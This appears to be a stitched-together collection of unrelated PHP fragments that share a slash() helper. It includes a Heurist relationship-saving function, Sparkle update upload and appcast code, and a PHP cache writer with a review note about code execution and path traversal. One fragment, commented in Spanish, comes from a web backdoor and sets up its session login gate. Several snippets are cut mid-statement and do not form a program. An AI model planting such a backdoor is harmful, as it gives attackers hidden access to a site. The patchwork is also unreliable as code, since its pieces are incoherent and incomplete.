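 * NOTE(review): the two inserts are not wrapped in a transaction; if the
 * detail insert fails, the Records row stays behind.
 *
 * @param int    $recID       Source (primary) record ID.
 * @param int    $relTermID   defTerms ID of the relation type.
 * @param int    $trgRecID    Target record ID.
 * @param int    $interpRecID Interpretation record ID; falsy to omit.
 * @param string $title       Relationship title.
 * @param string $notes       Short summary; falsy to omit.
 * @param string $start_date  Start date; falsy to omit.
 * @param string $end_date    End date; falsy to omit.
 * @return array array("error" => ...) on a database error, otherwise
 *               array("relationship" => ..., "relnRecID" => ...).
 */
function saveRelationship($recID, $relTermID, $trgRecID, $interpRecID, $title, $notes, $start_date, $end_date)
{
    // These values are interpolated unquoted into the queries below.
    $recID = intval($recID);
    $relTermID = intval($relTermID);
    $trgRecID = intval($trgRecID);
    $interpRecID = intval($interpRecID);

    $relval = mysql_fetch_assoc(mysql_query("select trm_Label from defTerms where trm_ID = {$relTermID}"));
    $relval = $relval['trm_Label'];
    $srcTitle = mysql_fetch_assoc(mysql_query("select rec_Title from Records where rec_ID = {$recID}"));
    $srcTitle = $srcTitle['rec_Title'];
    $trgTitle = mysql_fetch_assoc(mysql_query("select rec_Title from Records where rec_ID = {$trgRecID}"));
    $trgTitle = $trgTitle['rec_Title'];

    // Owner: requested group, else the (unset) user default, else the configured default, else the user.
    $ownerID = intval(@$_REQUEST['rec_owner']) ? intval($_REQUEST['rec_owner']) : (@$userDefaultOwnerGroupID ? $userDefaultOwnerGroupID : (defined('HEURIST_NEWREC_OWNER_ID') ? HEURIST_NEWREC_OWNER_ID : get_user_id()));

    mysql__insert("Records", array(
        "rec_Title" => "{$title} ({$srcTitle} {$relval} {$trgTitle})",
        "rec_Added" => date('Y-m-d H:i:s'),
        "rec_Modified" => date('Y-m-d H:i:s'),
        "rec_RecTypeID" => RT_RELATION,
        'rec_OwnerUGrpID' => $ownerID,
        "rec_AddedByUGrpID" => get_user_id(),
    ));
    if (mysql_error()) {
        return array("error" => slash(mysql_error()));
    }

    $relnRecID = mysql_insert_id();
    if ($relnRecID > 0 && defined('DT_NAME') && defined('DT_RELATION_TYPE') && defined('DT_TARGET_RESOURCE') && defined('DT_PRIMARY_RESOURCE')) {
        $query = "insert into recDetails (dtl_RecID, dtl_DetailTypeID, dtl_Value) values ";
        $query .= "({$relnRecID}, " . DT_NAME . ", '" . mysql_real_escape_string($title) . "')";
        $query .= ", ({$relnRecID}, " . DT_PRIMARY_RESOURCE . ", {$recID})";
        $query .= ", ({$relnRecID}, " . DT_TARGET_RESOURCE . ", {$trgRecID})";
        $query .= ", ({$relnRecID}, " . DT_RELATION_TYPE . ", {$relTermID})";
        if ($interpRecID && defined('DT_INTERPRETATION_REFERENCE')) {
            $query .= ", ({$relnRecID}, " . DT_INTERPRETATION_REFERENCE . ", {$interpRecID})";
        }
        if ($notes && defined('DT_SHORT_SUMMARY')) {
            $query .= ", ({$relnRecID}, " . DT_SHORT_SUMMARY . ", '" . mysql_real_escape_string($notes) . "')";
        }
        if ($start_date && defined('DT_START_DATE')) {
            $query .= ", ({$relnRecID}, " . DT_START_DATE . ", '" . mysql_real_escape_string($start_date) . "')";
        }
        if ($end_date && defined('DT_END_DATE')) {
            $query .= ", ({$relnRecID}, " . DT_END_DATE . ", '" . mysql_real_escape_string($end_date) . "')";
        }
        mysql_query($query);
    }

    if (mysql_error()) {
        return array("error" => slash(mysql_error()));
    }

    $related = getAllRelatedRecords($recID);
    return array("relationship" => $related, "relnRecID" => $relnRecID);
}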
$data = get_data_from_url($v->url); if (!$data) { die("The file at <a href='{$v->url}'>{$v->url}</a> does not exist or is empty!"); } file_put_contents($tmpfile, $data); } else { $tmpfile = $_FILES['file']['tmp_name']; } $v->filesize = filesize($tmpfile); $v->signature = sign_file($tmpfile, $app->sparkle_pkey); if (!$v->url) { $object = strtolower(preg_replace('/[^a-zA-Z0-9]/', '', $app->name)) . "_" . $v->version_number . "." . substr($_FILES['file']['name'], -3); if ($app->s3bucket && $app->s3path) { $v->url = slash($app->s3path) . $object; $info = parse_url($app->s3path); $object = slash($info['path']) . $object; chmod($tmpfile, 0755); $s3 = new S3($app->s3key, $app->s3pkey); $s3->putObject($app->s3bucket, $object, $tmpfile, true); } else { die("Configure your Amazon S3 account or modify version-new.php file."); /* $v->url = '/Users/dirk/work/wordpress/shine/' . $object; copy($_FILES['file']['tmp_name'], '/Users/dirk/work/wordpress/shine/' . $object); */ } } else { // Cleanup download unlink($tmpfile); } $v->insert();
$link_actual = "http://" . $HTTP_HOST . $REQUEST_URI; /* nombre puesto al backdoor ej: backdoor.php, ingresar solo backdoor */ $uri = $REQUEST_URI; /*Funcion para quitar slash*/ function slash($valor) { $nopermitido = array("/"); $valor = str_replace($nopermitido, "", $valor); return $valor; } /*Armamos el link*/ if (strpos($uri, "?")) { $last_uri = explode("?", $uri); $nombre_backdoor = slash($last_uri[0]); } else { $nombre_backdoor = slash($uri); } session_start(); if (!isset($_SESSION['user'])) { /* * Verificamos que se haya enviado el formulario de login * y comprobamos los datos */ if (isset($_POST['cerrojo'])) { if ($_POST['key'] == $pass and $_POST['cerrojo'] == $user) { session_start(); $_SESSION['user'] = $user; header("Location:{$link_actual}"); } else { if (empty($_POST['key']) or empty($_POST['cerrojo'])) { echo "<script>alert('Ingresa tus datos')</script>";
echo $app->name; ?> <?php echo $v->human_version; ?> </title> <description><![CDATA[ <?php echo $v->release_notes; ?> ]]></description> <pubDate><?php echo dater($v->dt, 'D, d M Y H:i:s O'); ?> </pubDate> <enclosure url="<?php echo "http://" . $_SERVER['HTTP_HOST'] . slash(WEB_ROOT) . "update.php?id={$v->id}"; ?> " sparkle:shortVersionString="<?php echo $v->human_version; ?> " sparkle:version="<?php echo $v->version_number; ?> " length="<?php echo $v->filesize; ?> " type="application/octet-stream" sparkle:dsaSignature="<?php echo $v->signature; ?> " /> </item>
/**
 * Writes a PHP cache file.
 *
 * A non-empty array is stored as a "$cache = ...;" assignment produced by
 * rvar_export(); any other value is appended to the file header as it is.
 *
 * NOTE(review): the target is a .php file, so a non-array $data is executed
 * as PHP code when the cache file is included. $dir, $prefix and $cachename
 * are joined into the path with no check for "../" visible here (whatever
 * slash() does to the path is defined elsewhere). Confirm that none of these
 * values can be derived from request input.
 *
 * @param string $dir       Directory path.
 * @param string $cachename File name (without extension).
 * @param array  $data      Data to cache.
 * @param string $prefix    File name prefix.
 */
function write_cache_file($dir, $cachename, $data = array(), $prefix = 'cache_')
{
    $has_array_payload = !empty($data) && is_array($data);
    $cachedata = $has_array_payload
        ? "\$cache = " . rvar_export($data) . ";\n\n"
        : $data;

    $target = slash($dir . $prefix . $cachename) . '.php';
    $header = "<?php\n//Myws! cache file, DO NOT modify me!\n//Created on " . date("M j, Y, G:i") . "\n\n";

    rfwrite($target, $header . $cachedata, 'w');
}